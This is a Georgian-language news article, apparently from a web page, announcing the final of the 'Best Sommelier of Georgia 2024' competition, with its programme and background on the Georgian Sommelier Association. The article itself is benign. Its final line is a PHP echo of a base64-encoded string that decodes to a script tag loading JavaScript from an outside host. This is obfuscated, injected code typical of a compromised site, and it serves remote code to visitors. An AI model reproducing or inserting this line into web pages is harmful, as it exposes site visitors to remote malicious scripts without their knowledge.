celsiusi
ავერსი შნაიდერი

 9 ოქტომბერს საქართველოს სომელიეთა ასოციაცია, ღვინის ეროვნული სააგენტოს მხარდაჭერით საქართველოს საუკეთესო სომელიე 2024 გამოავლენს.

ღონისძიება საქართველოში სომელიეთა საუკეთესო უნარებისა და პროფესიონალიზმის წარმოჩენას ემსახურება, სადაც მასპინძლობისა და ღვინის სფეროების წარმომადგენლები მიიღებენ მონაწილეობას. გამარჯვებული კი 2026 წელს ლისაბონში დაგეგმილ მსოფლიო სომელიეთა კონკურსზე წარადგენს საქართველოს.

ღონისძიება მიზნად ისახავს არა მხოლოდ საუკეთესო სომელიეს გამოვლენას, არამედ სომელიეების პროფესიული ზრდისა და განვითარების მხარდაჭერას, რაც ქართული ღვინის კულტურის პოზიციების გაძლიერებას უწყობს ხელს მსოფლიო ღვინის სცენაზე.

მონაწილეებმა უკვე გაიარეს კონკურსის პირველი ტური, რომელიც 30 სექტემბერს სასტუმრო AFISHA-ში ჩატარდა. ფინალი კი 9 ოქტომბერს გაიმართება, სადაც საქართველოს საუკეთესო სომელიე 2024 გამოვლინდება.

კონკურსის მონაწილეებს შეაფასებენ ჟიურის წევრები, რომლებიც ამ სფეროში აღიარებული პროფესიონალები არიან და უზრუნველყოფენ, რომ გამარჯვებული მაღალი სტანდარტების შესაბამისი სომელიე იყოს.

კონკურსის განრიგი:
 გასტრონომიული მიღება;
 გახსნა - ნანი ბრეგვაძე;
 სამი ფინალისტების ასპარეზობა;
 ნიკოლოზ წულუკიძის პერფორმანსი;
 თეატრი • Theatre - მიუზიკლების კომპოზიცია;
 დაჯილდოების ცერემონია;
 After party;

საქართველოს სომელიეთა ასოციაცია 2003 წელს დაარსდა და საერთაშორისო სომელიეთა ასოციაციის წევრია. ასოციაცია მნიშვნელოვან როლს თამაშობს ღვინისა და მასპინძლობის სფეროების განვითარებაში და მიზნად ისახავს საქართველოში ღვინის კულტურის განვითარების ხელშეწყობას, ღვინის განათლებისა და ენოგასტრონომიული ტურიზმის ხარისხის ამაღლებას, რაც საბოლოო ჯამში
ქართული ღვინის სფეროს ზრდას და საერთაშორისო აღიარებას ემსახურება.

81
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");